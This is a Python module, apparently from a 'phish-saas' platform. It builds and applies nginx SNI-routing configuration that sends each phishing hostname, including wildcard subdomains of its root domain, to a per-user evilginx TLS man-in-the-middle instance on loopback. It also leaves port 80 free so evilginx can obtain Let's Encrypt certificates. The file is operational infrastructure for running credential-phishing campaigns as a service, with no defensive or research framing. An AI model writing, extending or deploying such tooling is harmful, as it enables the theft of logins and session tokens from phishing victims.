"""Generate the nginx TCP SNI proxy config that routes each phishing
hostname to its per-user evilginx instance on 127.0.0.x:443.

Public :443 (nginx stream) -> SNI lookup -> 127.0.0.x:443 evilginx (TLS MITM).
Public :80 (nginx http)    -> 301 redirect / ACME.
"""
import logging
import subprocess
from pathlib import Path

logger = logging.getLogger("agent.nginx")

SNI_TEMPLATE = """# Generated by phish-saas agent. DO NOT EDIT MANUALLY.
# Regenerated on every instance provision/teardown.

map $ssl_preread_server_name $evg_backend hostnames {{
{entries}
    default  off;
}}

map $ssl_preread_server_name $evg_sni hostnames {{
{snips}
    default  $ssl_preread_server_name;
}}

server {{
    listen {listen_addr}:443;
    ssl_preread on;
    proxy_pass $evg_backend;
    proxy_connect_timeout 5s;
}}
"""

def _root_domain(hostname: str) -> str:
    """Reduce a phishing host (e.g. login.example.com) to its registrable root
    (example.com) so one SNI map entry + wildcard routes every evilginx proxy
    host (login, www, login2, ...) to the same loopback instance."""
    parts = hostname.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 3 else hostname


def render_sni(instances: dict[str, dict], external_ip: str = "0.0.0.0") -> str:
    entries = []
    snips = []
    seen = set()
    for hostname, meta in sorted(instances.items()):
        for h in sorted({hostname, _root_domain(hostname)}):
            if h in seen:
                continue
            seen.add(h)
            entries.append(f"    {h}    {meta['loopback_ip']}:443;")
            entries.append(f"    *.{h}    {meta['loopback_ip']}:443;")
            snips.append(f"    {h}    {meta['loopback_ip']};")
    listen_addr = external_ip if external_ip and external_ip != "0.0.0.0" else "0.0.0.0"
    return SNI_TEMPLATE.format(
        listen_addr=listen_addr,
        entries="\n".join(entries),
        snips="\n".join(snips) or "",
    )


def render_http(instances: dict[str, dict], external_ip: str = "0.0.0.0") -> str:
    # Do NOT bind port 80 in nginx. evilginx's own HTTP-01 ACME challenge
    # server hardcodes listening on 0.0.0.0:80; nginx must stay off port 80
    # entirely or evilginx can't solve Let's Encrypt challenges.
    return "# Generated by phish-saas agent. Port 80 intentionally left to evilginx\n# (its ACME HTTP-01 challenge server binds 0.0.0.0:80).\n"


def apply(sni_conf: str, http_conf: str, sni_path: Path, http_path: Path, apply: bool) -> tuple[str, str]:
    sni_path.parent.mkdir(parents=True, exist_ok=True)
    http_path.parent.mkdir(parents=True, exist_ok=True)
    sni_path.write_text(sni_conf)
    http_path.write_text(http_conf)
    if apply:
        r = subprocess.run(["nginx", "-t"], capture_output=True, text=True)
        if r.returncode != 0:
            raise RuntimeError(f"nginx -t failed: {r.stderr[-500:]}")
        subprocess.run(["nginx", "-s", "reload"], check=True)
        logger.info("nginx config applied + reloaded: %s, %s", sni_path, http_path)
    else:
        logger.info("[dry-run] wrote nginx snippets to %s, %s (not applied)", sni_path, http_path)
    return str(sni_path), str(http_path)